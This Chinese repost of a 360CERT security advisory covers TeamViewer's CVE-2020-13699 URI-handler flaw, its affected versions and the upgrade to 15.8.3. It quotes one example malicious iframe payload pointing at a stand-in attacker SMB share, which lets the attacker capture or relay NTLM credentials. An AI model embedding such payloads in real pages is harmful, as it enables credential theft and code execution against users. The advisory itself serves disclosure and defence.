您好,登录后才能下订单哦!
本篇文章给大家分享的是有关怎么解析TeamViewer 用户密码破解漏洞,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。
2020年08月10日,360CERT监测发现TeamViewer官方
发布了TeamViewerURL处理
的风险通告,该漏洞编号为CVE-2020-13699
,漏洞等级:高危
,漏洞评分:8.8分
。TeamViewer
存在未引用的搜索路径或元素的安全缺陷,更具体地说,这是由于应用程序没有正确引用它的自定义URI
处理程序,当安装了TeamViewer
的易受攻击版本的用户访问恶意创建的网站时,可能会被黑客利用。
对此,360CERT建议广大用户及时将TeamViewer
升级到15.8.3
版本。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。
360CERT对该漏洞的评定结果如下
评定方式 | 等级 |
---|---|
威胁等级 | 高危 |
影响面 | 广泛 |
360CERT评分 | 8.8分 |
TeamViewer
主要用于远程访问和控制各种类型的计算机系统和移动设备,但也提供协作和演示功能(例如,桌面共享、网络会议、文件传输等)。
TeamViewer
存在未引用的搜索路径或元素的安全缺陷,更具体地说,这是由于应用程序没有正确引用它的自定义URI
处理程序,当安装了TeamViewer
的易受攻击版本的系统访问恶意创建的网站时,可能会被利用,攻击者可以使用精心制作的URL(iframesrc='teamviewer10:--play\\attacker-IP\share\fake.tvs'
)将恶意iframe
嵌入网站中,这将启动TeamViewerWindows
桌面客户端并强制其执行以下操作:打开远程SMB
共享。Windows
在打开SMB
共享时将执行NTLM
身份验证,并且可以将请求进行转发(使用诸如响应程序之类的工具)以执行代码(或捕获以进行哈希破解)。
TeamViewer<8.0.258861
TeamViewer<9.0.28860
TeamViewer<10.0.258873
TeamViewer<11.0.258870
TeamViewer<12.0.258869
TeamViewer<13.2.36220
TeamViewer<14.2.56676
TeamViewer<15.8.3
升级到15.8.3
版本,下载地址为:
Previous TeamViewer versions 10 – 11 – 12 – 13 – 14
https://www.teamviewer.com/en/download/previous-versions/
360安全大脑-Quake网络空间测绘系统通过对全网资产测绘,发现TeamViewer
在全球
均有广泛使用,具体分布如下图所示。
360安全大脑的QUAKE资产测绘平台通过资产测绘技术手段,对该类漏洞进行监测,请用户联系相关产品区域负责人或(quake#360.cn)获取对应产品。
以上就是怎么解析TeamViewer 用户密码破解漏洞,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注亿速云行业资讯频道。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。